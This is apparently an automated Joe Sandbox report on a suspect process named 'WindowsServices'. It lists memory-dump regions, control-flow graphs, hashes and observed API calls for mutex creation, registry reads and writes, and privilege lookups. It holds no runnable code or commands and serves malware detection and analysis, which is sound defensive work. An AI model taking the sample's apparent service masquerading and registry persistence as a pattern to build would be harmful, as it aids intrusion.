                                                                        • Opcode ID: 48194ae8c9dd0daffd305c8dfbbc55a2834b53bd6dac99910e9c18f69a0ff9be
                                                                        • Instruction ID: 0ae85d38d78edfa2359cee0060955bc075a9df894fab8a732cf36613baae32ca
                                                                        • Opcode Fuzzy Hash: 48194ae8c9dd0daffd305c8dfbbc55a2834b53bd6dac99910e9c18f69a0ff9be
                                                                        • Instruction Fuzzy Hash: 45616074A01258CFDB14EF75C945BECB7B2BF84309F1080AAD449AB295DB399E85CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 47 4d30429-4d304c8 58 4d304ca 47->58 59 4d304cf-4d304e9 47->59 58->59 61 4d30520-4d30677 59->61 62 4d304eb-4d30515 59->62 81 4d306ff-4d30bb8 61->81 82 4d3067d-4d306bb 61->82 62->61 82->81
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1928694207.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_4d30000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2k$2k$a
                                                                        • API String ID: 0-3689935833
                                                                        • Opcode ID: 89dfc748af253c58463c0ab8703c8d66605534494d49be34a45ff9a2bcfbdb3e
                                                                        • Instruction ID: 0ad53c60bcf13bb0411e21063381328ef5c3d800495563a3b468dbb2995c1d7b
                                                                        • Opcode Fuzzy Hash: 89dfc748af253c58463c0ab8703c8d66605534494d49be34a45ff9a2bcfbdb3e
                                                                        • Instruction Fuzzy Hash: 1E515D74A012188FDB64EF75C955BECB7B2AF84308F5080AAD409BB394DB355E89CF61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 88 e8ab92-e8ac15 92 e8ac1a-e8ac23 88->92 93 e8ac17 88->93 94 e8ac28-e8ac31 92->94 95 e8ac25 92->95 93->92 96 e8ac82-e8ac87 94->96 97 e8ac33-e8ac57 CreateMutexW 94->97 95->94 96->97 100 e8ac89-e8ac8e 97->100 101 e8ac59-e8ac7f 97->101 100->101
                                                                        APIs
                                                                        • CreateMutexW.KERNELBASE(?,?), ref: 00E8AC39
                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1919595339.0000000000E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_e8a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CreateMutex
                                                                        • String ID:
                                                                        • API String ID: 1964310414-0
                                                                        • Opcode ID: ed611df534ef1e9a573d792939c7fc4490bd97c996c618c6ab8c6d7521c5ca87
                                                                        • Instruction ID: d7312565266fe88a319b4ef8e0fe72847783b6c53c1af4e43508ad07bd7d7cee
                                                                        • Opcode Fuzzy Hash: ed611df534ef1e9a573d792939c7fc4490bd97c996c618c6ab8c6d7521c5ca87
                                                                        • Instruction Fuzzy Hash: 2931B3B55093805FE712CB25DD48B96FFF8EF06314F09849AE988DB292D335A909C762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 104 e8a361-e8a3cf 107 e8a3d1 104->107 108 e8a3d4-e8a3dd 104->108 107->108 109 e8a3df 108->109 110 e8a3e2-e8a3e8 108->110 109->110 111 e8a3ea 110->111 112 e8a3ed-e8a404 110->112 111->112 114 e8a43b-e8a440 112->114 115 e8a406-e8a419 RegQueryValueExW 112->115 114->115 116 e8a41b-e8a438 115->116 117 e8a442-e8a447 115->117 117->116
                                                                        APIs
                                                                        • RegQueryValueExW.KERNELBASE(?,00000E24,DFFF4500,00000000,00000000,00000000,00000000), ref: 00E8A40C
                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1919595339.0000000000E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_e8a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue
                                                                        • String ID:
                                                                        • API String ID: 3660427363-0
                                                                        • Opcode ID: f77814e4455bd3d6ba68784e7684c28c5c45f88a1847e6246c9e0fc61cbf2611
                                                                        • Instruction ID: b3de761565e3a4275b870f9a6dbeabeded9270c7f1392b5eb4facfec33fb3c67
                                                                        • Opcode Fuzzy Hash: f77814e4455bd3d6ba68784e7684c28c5c45f88a1847e6246c9e0fc61cbf2611
                                                                        • Instruction Fuzzy Hash: D431B4751057405FE722CF11DC84F92BBF8EF05714F08849AE9499B692D324E908CB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 121 e8a462-e8a4c3 124 e8a4c8-e8a4d4 121->124 125 e8a4c5 121->125 126 e8a4d9-e8a4f0 124->126 127 e8a4d6 124->127 125->124 129 e8a4f2-e8a505 RegSetValueExW 126->129 130 e8a527-e8a52c 126->130 127->126 131 e8a52e-e8a533 129->131 132 e8a507-e8a524 129->132 130->129 131->132
                                                                        APIs
                                                                        • RegSetValueExW.KERNELBASE(?,00000E24,DFFF4500,00000000,00000000,00000000,00000000), ref: 00E8A4F8
                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1919595339.0000000000E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_e8a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID:
                                                                        • API String ID: 3702945584-0
                                                                        • Opcode ID: e439054be9ad7b6815a42b6efbe67654d5ac96dc5fcf8c4acf47825148263671
                                                                        • Instruction ID: 8659e3ebecceb90e6c7106893ee685974ec6ea23e1269434acd375790a17f7ed
                                                                        • Opcode Fuzzy Hash: e439054be9ad7b6815a42b6efbe67654d5ac96dc5fcf8c4acf47825148263671
                                                                        • Instruction Fuzzy Hash: 3D21B2B21043806FE7228F11DD44FA3BFB8DF06714F08849AE949DB652D264E948C771
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 149 e8a67b-e8a6d5 151 e8a6da-e8a6e0 149->151 152 e8a6d7 149->152 153 e8a6e2 151->153 154 e8a6e5-e8a6ee 151->154 152->151 153->154 155 e8a6f0-e8a6f8 LookupPrivilegeValueW 154->155 156 e8a731-e8a736 154->156 158 e8a6fe-e8a710 155->158 156->155 159 e8a738-e8a73d 158->159 160 e8a712-e8a72e 158->160 159->160
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00E8A6F6
                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1919595339.0000000000E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_e8a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 6be88b530f82d3babf6f2479104f3cb42c1b2b394b27e56d48c5d30c0ede5768
                                                                        • Instruction ID: f4d9bc368c1b54ff07978465b4860ab6324fbab770172de2e4e36498a37deb52
                                                                        • Opcode Fuzzy Hash: 6be88b530f82d3babf6f2479104f3cb42c1b2b394b27e56d48c5d30c0ede5768
                                                                        • Instruction Fuzzy Hash: B32183755093805FE7128B65DC45B92BFF8EF06324F0D84EBE988CB2A3D225D918D762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 162 e8abc6-e8ac15 165 e8ac1a-e8ac23 162->165 166 e8ac17 162->166 167 e8ac28-e8ac31 165->167 168 e8ac25 165->168 166->165 169 e8ac82-e8ac87 167->169 170 e8ac33-e8ac3b CreateMutexW 167->170 168->167 169->170 171 e8ac41-e8ac57 170->171 173 e8ac89-e8ac8e 171->173 174 e8ac59-e8ac7f 171->174 173->174
                                                                        APIs
                                                                        • CreateMutexW.KERNELBASE(?,?), ref: 00E8AC39
                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1919595339.0000000000E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_e8a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CreateMutex
                                                                        • String ID:
                                                                        • API String ID: 1964310414-0
                                                                        • Opcode ID: 4d3243e1bca655752bcb69df1fbf655c3db69b1390e07d1df9e0ddd72099b889
                                                                        • Instruction ID: d49c4ab810f3a22b03674a9015278088cfa7b42bb5be6d42059b857f068bfd97
                                                                        • Opcode Fuzzy Hash: 4d3243e1bca655752bcb69df1fbf655c3db69b1390e07d1df9e0ddd72099b889
                                                                        • Instruction Fuzzy Hash: 6F2180B15002009FF720DF65DD49BA6FBE8EF04724F18846AED489B741D375E908CB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 177 e8a392-e8a3cf 179 e8a3d1 177->179 180 e8a3d4-e8a3dd 177->180 179->180 181 e8a3df 180->181 182 e8a3e2-e8a3e8 180->182 181->182 183 e8a3ea 182->183 184 e8a3ed-e8a404 182->184 183->184 186 e8a43b-e8a440 184->186 187 e8a406-e8a419 RegQueryValueExW 184->187 186->187 188 e8a41b-e8a438 187->188 189 e8a442-e8a447 187->189 189->188
                                                                        APIs
                                                                        • RegQueryValueExW.KERNELBASE(?,00000E24,DFFF4500,00000000,00000000,00000000,00000000), ref: 00E8A40C
                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1919595339.0000000000E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_e8a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue
                                                                        • String ID:
                                                                        • API String ID: 3660427363-0
                                                                        • Opcode ID: db6733b53308cffccc37afc1378350fe8105ac20d2934b2ddaa8a7601752c2d3
                                                                        • Instruction ID: 9df7b21943b23c375f3092302fc8870700c941b7b2af04738625b5b19df69855
                                                                        • Opcode Fuzzy Hash: db6733b53308cffccc37afc1378350fe8105ac20d2934b2ddaa8a7601752c2d3
                                                                        • Instruction Fuzzy Hash: 9921C0B52006009FEB20DF15DD88FA6F7ECEF04714F08846AED499B651D360E908CB72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 193 e8a960-e8a9c4 195 e8a9c6-e8a9ce FindCloseChangeNotification 193->195 196 e8aa07-e8aa0c 193->196 197 e8a9d4-e8a9e6 195->197 196->195 199 e8a9e8-e8aa04 197->199 200 e8aa0e-e8aa13 197->200 200->199
                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00E8A9CC
                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1919595339.0000000000E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_e8a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 19f1c40c97e052851263997f5265ee54f2469e3bd6b45862a41f49aea9221eb4
                                                                        • Instruction ID: 1a7ed2d63fce56ad7aadeb26346ff43dbae63dcab4b8026a23d19ba4271cdea1
                                                                        • Opcode Fuzzy Hash: 19f1c40c97e052851263997f5265ee54f2469e3bd6b45862a41f49aea9221eb4
                                                                        • Instruction Fuzzy Hash: 3A219F725093C05FDB128B25DD54A92BFA4AF07724F0D84DAE9858F663D264A908CB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 202 e8a486-e8a4c3 204 e8a4c8-e8a4d4 202->204 205 e8a4c5 202->205 206 e8a4d9-e8a4f0 204->206 207 e8a4d6 204->207 205->204 209 e8a4f2-e8a505 RegSetValueExW 206->209 210 e8a527-e8a52c 206->210 207->206 211 e8a52e-e8a533 209->211 212 e8a507-e8a524 209->212 210->209 211->212
                                                                        APIs
                                                                        • RegSetValueExW.KERNELBASE(?,00000E24,DFFF4500,00000000,00000000,00000000,00000000), ref: 00E8A4F8
                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1919595339.0000000000E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_e8a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID:
                                                                        • API String ID: 3702945584-0
                                                                        • Opcode ID: 542c341f3c51948563979ec5ca0ea4b2937dc2e5e952b5b7af674ecf1cb16328
                                                                        • Instruction ID: 850ad92e64ad866fd39bf337d0c98d0104eeac61db26fbb7ac168c490745f8c2
                                                                        • Opcode Fuzzy Hash: 542c341f3c51948563979ec5ca0ea4b2937dc2e5e952b5b7af674ecf1cb16328
                                                                        • Instruction Fuzzy Hash: 7611B4B65006009FEB219F11DD48FA7BBECEF04714F08846AED499A751D374E948CB72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 224 e8a6ae-e8a6d5 225 e8a6da-e8a6e0 224->225 226 e8a6d7 224->226 227 e8a6e2 225->227 228 e8a6e5-e8a6ee 225->228 226->225 227->228 229 e8a6f0-e8a6f8 LookupPrivilegeValueW 228->229 230 e8a731-e8a736 228->230 232 e8a6fe-e8a710 229->232 230->229 233 e8a738-e8a73d 232->233 234 e8a712-e8a72e 232->234 233->234
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00E8A6F6
                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1919595339.0000000000E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_e8a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: af3493551a32d67ee0d692d7bab45220b79ce12856d5d2c5a461e0051bdecefc
                                                                        • Instruction ID: 8c2dd841da52514d00501c341a372322c03d45ca9b34b1c4990ad1d92e17b2eb
                                                                        • Opcode Fuzzy Hash: af3493551a32d67ee0d692d7bab45220b79ce12856d5d2c5a461e0051bdecefc
                                                                        • Instruction Fuzzy Hash: FA1170756002008FEB10DF15D948B56BBE8EF04724F1C846BDD0DDB755E275E818DB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 246 e8a99a-e8a9c4 247 e8a9c6-e8a9ce FindCloseChangeNotification 246->247 248 e8aa07-e8aa0c 246->248 249 e8a9d4-e8a9e6 247->249 248->247 251 e8a9e8-e8aa04 249->251 252 e8aa0e-e8aa13 249->252 252->251
                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00E8A9CC
                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1919595339.0000000000E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_e8a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: d1d21ebbc3d71649bee435560daca68a19a0ba50be985ab21edd843b9df8394f
                                                                        • Instruction ID: f90b6a57b099c0834b933216eaf056ce9e7537ea40c5a2784fdb99ed2552893e
                                                                        • Opcode Fuzzy Hash: d1d21ebbc3d71649bee435560daca68a19a0ba50be985ab21edd843b9df8394f
                                                                        • Instruction Fuzzy Hash: 4601D4755046408FEB10DF15E988792FBE4EF40724F08C4ABDD0D8BB56D274E908CB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1928694207.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_4d30000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1d6f4dfc1660751cb37cbca01891cdd7a0d2dde78697ccd62f7b8bbbad5e8ab8
                                                                        • Instruction ID: 3cfd388c3c58679e456526e6eb6d735bfa6893462b4ac9716ab3bc8435f87fe6
                                                                        • Opcode Fuzzy Hash: 1d6f4dfc1660751cb37cbca01891cdd7a0d2dde78697ccd62f7b8bbbad5e8ab8
                                                                        • Instruction Fuzzy Hash: 3D4159341062C58FC704FF36EA8D68AB7B2AB8134C7468529D404DB66EDF785D4DCB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1920552667.0000000001010000.00000040.00000020.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_1010000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 250e8ac9a7a955f43843a918b73009323ee11084363c5da26ba5e5f5ab46ed12
                                                                        • Instruction ID: 0cb8258ca6ad8bb8f02ce6f00c67c8290aefb3009cceae3d2225b744bfebc32a
                                                                        • Opcode Fuzzy Hash: 250e8ac9a7a955f43843a918b73009323ee11084363c5da26ba5e5f5ab46ed12
                                                                        • Instruction Fuzzy Hash: 7301F9B650D7C05FCB128B15EC40862FFE8EF4662070884DFE8C88B656D1296948CB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1928694207.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_4d30000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 73136bf5d3a159b9fdc7b8592ebd7293d296f3671056e19e77f375af31f34eb8
                                                                        • Instruction ID: 88cb66302fc6c5119266c2ec8a7074e99d5bc2cb90c29c9ca432713a06c0eec3
                                                                        • Opcode Fuzzy Hash: 73136bf5d3a159b9fdc7b8592ebd7293d296f3671056e19e77f375af31f34eb8
                                                                        • Instruction Fuzzy Hash: 37F027347002008BC3157739A82967E735BABC139A709443CE5459F389CF3D8C49C3E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1920552667.0000000001010000.00000040.00000020.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_1010000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 80202f69e02f0e8970d978b97d2a90d0d0b70f7544695257d121ce75d8202c2b
                                                                        • Instruction ID: 1d386670ed64e8463e79d880e83ab094246dc4ecc15bc2f6a8d3b4290b9821fe
                                                                        • Opcode Fuzzy Hash: 80202f69e02f0e8970d978b97d2a90d0d0b70f7544695257d121ce75d8202c2b
                                                                        • Instruction Fuzzy Hash: 10E092B66006044B9650DF0AFD45452F7D8EB84A30B18C07FDC0D8B711E276B508CAA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1919455777.0000000000E82000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E82000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_e82000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9fd94855a1d5feae1c10f0f95394c27de1980256bf9c50a9031d55d5c1a5aa40
                                                                        • Instruction ID: 8cbe502c5bb4112953c76eb47b315f4fd31b38c99e38f9dbbdc4d0a588290214
                                                                        • Opcode Fuzzy Hash: 9fd94855a1d5feae1c10f0f95394c27de1980256bf9c50a9031d55d5c1a5aa40
                                                                        • Instruction Fuzzy Hash: F2D05E792056C14FD316AA1CD2A8F9537D4AB55718F4A44FEA8088B763C768D981E610
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1919455777.0000000000E82000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E82000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_e82000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d94322273464de44eb3028af2894609cd3abc88933ab7923a45e25c18c94c690
                                                                        • Instruction ID: 7525333311329abb23096691a7129edca9b32650b85ead0a930c4658500d368b
                                                                        • Opcode Fuzzy Hash: d94322273464de44eb3028af2894609cd3abc88933ab7923a45e25c18c94c690
                                                                        • Instruction Fuzzy Hash: 54D05E342006824BCB16EA1CD6E8F5937D4AB44718F0644ECBC148B762C7A8D9C0DA00
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1928694207.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_4d30000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 81e9dfc51e8e25d46bc15fccdad26c2c7170806281f9f786d7ad296d834ea2a1
                                                                        • Instruction ID: 6e38b892651cce857b6fc3535313779784102226a87e50c84f415e83dc7fe548
                                                                        • Opcode Fuzzy Hash: 81e9dfc51e8e25d46bc15fccdad26c2c7170806281f9f786d7ad296d834ea2a1
                                                                        • Instruction Fuzzy Hash:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%